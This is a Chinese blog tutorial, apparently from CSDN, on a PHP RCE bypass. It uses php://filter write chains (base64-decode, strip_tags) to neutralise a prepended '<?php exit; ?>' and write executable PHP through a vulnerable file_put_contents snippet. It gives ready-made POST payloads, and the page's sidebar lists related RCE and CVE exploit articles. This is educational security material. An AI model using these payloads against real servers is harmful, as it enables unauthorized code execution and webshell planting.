RCE编码绕过--php://filter妙用

已于 2024-08-16 17:02:58 修改
阅读量270 收藏 2
点赞数 2
文章标签: RCE 绕过 渗透 学习 安全 webshell php
于 2024-08-16 16:29:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141258258
版权

目录

代码

如何绕过

payload构造

代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'],$content);

当你想要输入代码的时候前面会有<?php exit;?>;,代码没有办法执行下去,所以我们要想办法绕过

如何绕过

我们可以尝试使用php://filter/write=convert.base64-decode/resource=abc.php,在写入文件的时候对文件进行解码,然后我们后面POST传参的时候可以传一个base64编码,然后php://file解码的时候会将前面的<?php exit;?>解码成别的字符,然后将你输入的base64编码解码成原来的字符

<?php phpinfo();的编码

PD9waHAgcGhwaW5mbygpOw==

抓包提交参数,所提交的txt前面需要加一个a,这个的原因是base是4位一解码,txt前面加a是用来给<?php exit; ?>补位的

payload构造

txt=aPD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=convert.base64-decode/resource=abc.php

看一下我们的文件路径,多出一个abc.php文件且前面的<?php exit; ?>被编码成乱码了,然后后面的php代码就可以执行了

php://filter还有别的标签string.strip_tags,这个标签可以从字符串中去除 HTML 和 PHP 标记。

然后我们可以传一个base64的编码然后先去除,<?php exit; ?>标签然后再解码,php://filter可以使用多个过滤器

如下,这里txt前面就没有了a

txt=PD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=abc.php

结果 

板栗妖怪
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php://filter利用条件,浅谈php://filter技巧
weixin_33744799的博客
03-28 1156
php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流必选read=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选write=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。巧用编码与解码$content ...
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
探索php://filter在实战当中的奇技淫巧
qq_45521281的博客
05-30 1732
前言 在渗透测试或漏洞挖掘的过程中,我们经常会遇到php://filter结合其它漏洞比如文件包含、文件读取、反序列化、XXE等进行组合利用,以达到一定的攻击效果,拿到相应的服务器权限。 最近看到php://filter在ThinkPHP反序列化中频繁出现利用其相应构造可以RCE,那么下面就来探索一下关于php://filter在漏洞挖掘中的一些奇技淫巧。 php://filter 在探索php://filter在实战当中的奇技淫巧时,一定要先了解关于php://filter的原理和利用。 php://fi
CVE-2024-2961:将phpfilter任意文件读取提升为远程代码执行(RCE
小司机的奥拓
06-06 1330
在nvd网站上是这样描述的:谷歌翻译过来就是:GNU C 库 (也就是glibc)2.39 及更早版本中的 iconv() 函数在将字符串转换为 ISO-2022-CN-EXT 字符集时,可能会使传递给它的输出缓冲区溢出最多 4 个字节,这可能会导致应用程序崩溃或覆盖相邻变量。缓冲区溢出是二进制安全研究领域里很常见的漏洞。所谓缓冲区溢出是指当一段程序尝试把更多的数据放入一个缓冲区,数据超出了缓冲区本身的容量,导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。
RCE漏洞总结及绕过---代码执行篇
qq_46603839的博客
04-30 1916
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 2847
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
php rce绕过
m0_73973498的博客
10-08 2547
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
RCE:命令注入 过滤空格 远程代码执行 php://input 读取源代码
qq_69100706的博客
08-12 731
命令注入是一种常见的技巧,用于实现远程代码执行(RCE)。命令注入发生在Web应用或服务接受用户输入并将其用于执行操作系统命令的场景中,如果用户输入未被妥善清理或验证,攻击者可以注入额外的命令,从而执行任意代码。
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 5452
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
Bypass-PHP-GD-Process-To-RCE:参考
06-14
使用 Similar-Block-Attack 绕过 PHP-GD 进程到 RCE。 用法 用法: php codeinj.php <src> <inj> php codeinj.php demo.gif "<?php phpinfo();?>" 然后新图像“gd_demo.gif”保存在当前路径中。 您可以使用...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
CVE-2020-14368:Eclipse CHE的交互式RCE漏洞演示
05-15
此漏洞影响使用cookie或基本身份验证的Eclipse CHE服务器,因为Websocket连接不会执行任何跨站点检查或通道内身份验证,从第三方域进行连接时,浏览器会自动包含所有凭据。 该攻击的工作原理与跨站点请求伪造攻击...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
VTK-vtkStructuredGrid学习
weixin_69505365的博客
08-14 358
可以理解为单元格顺序沿着坐标轴排列,但是每个单元格可以不一样。维度理解为X/Y/Z方向的点数,如草图所示分别是4,3,1。此时只提供了12个点,只能构造一层,5.点图、线图、面图如下,对应行的代码改一下出现不同效果图。7.增加Z方向维度,点也要增加,点序保持一致。6.点可以不在同一个平面,随机改变点Z数值。2.获取这些点信息,点顺序要严格按照图示。直接赋值第一层的12个点,改一下Z值。所以Z方向维度是1,不能是其他数据。1.使用CAD随意绘制个网格草图。4.将上面的网格显示出来。
fme处理空间数据入门v0
weixin_43229258的博客
08-13 731
本教程是最最最基本的fme处理空间数据内容,给新同事介绍我以前是怎么干活用的,基本啥有用的东西。本教程主要说如何在 FME Workbench中创建模板文件(一般我们把fme写的工作空间就叫模板),教程里面主要是利用GIS数据。按照分步说明操作,1.了解如何从读取数据;2.添加转换器以在空间上过滤数据;3.将过滤后的数据写入 Esri Shapefile;4.如何运行模板文件。
【Python】python中抽象类学习笔记
qq_42761751的博客
08-12 415
抽象类是一个不能被实例化的类,通常作为其他类的基类抽象方法是一个没有具体实现的方法一个抽象类可以有或者没有抽象方法, 但是一般来说定义抽象类的时候总会在类中定义抽象方法Python并没有直接支持抽象类,但是提供了一个模块(abc)来允许定义抽象类通过继承abc.ABC类定义一个抽象类pass上述代码中类虽然继承了ABC但是没有定义抽象方法,仍然可以被实例化。"""使用@abstractmethod来定义抽象方法"""passmain()代码报错:不能实例化一个带有抽象方法的抽象类。
CVPR2024 | PromptAD: 仅使用正常样本进行小样本异常检测的学习提示
最新发布
08-16 611
本文提出的PromptAD模型结构如图2所示。PromptAD建立在VV-CLIP之上,其视觉编码器用于提取全局和局部的特征。本文提出的语义串联(SC)用来设计提示。具体来说,将N个可学习的普通前缀与目标名称串联起来获得普通提示(NPs),然后将这N个普通提示分别与M个手动设置的异常后缀和L个可学习的异常后缀串联,以获得N×M个异常提示(MAPs)和N×L个可学习的异常提示(LAPs)。视觉特征和提示特征用于通过对比损失和本文提出的显式异常边界(EMA)损失来完成提示学习
如何学习Kubernetes?
CloudJourney的博客
08-13 660
在云计算和容器化技术日新月异的今天,Kubernetes(简称K8s)作为容器编排领域的领头羊,已经成为现代应用部署和管理的标准工具。本文旨在为有志于学习Kubernetes的读者提供一条清晰的学习路径,从基础概念到高级特性,再到实战应用,帮助大家逐步掌握这门强大的技术。通过本文提供的学习路径和实战建议,希望能够帮助你逐步掌握这门强大的技术,并在实际项目中灵活应用。同时,Kubernetes还提供了强大的社区支持和丰富的生态系统,使得开发者可以轻松地找到适合自己的解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值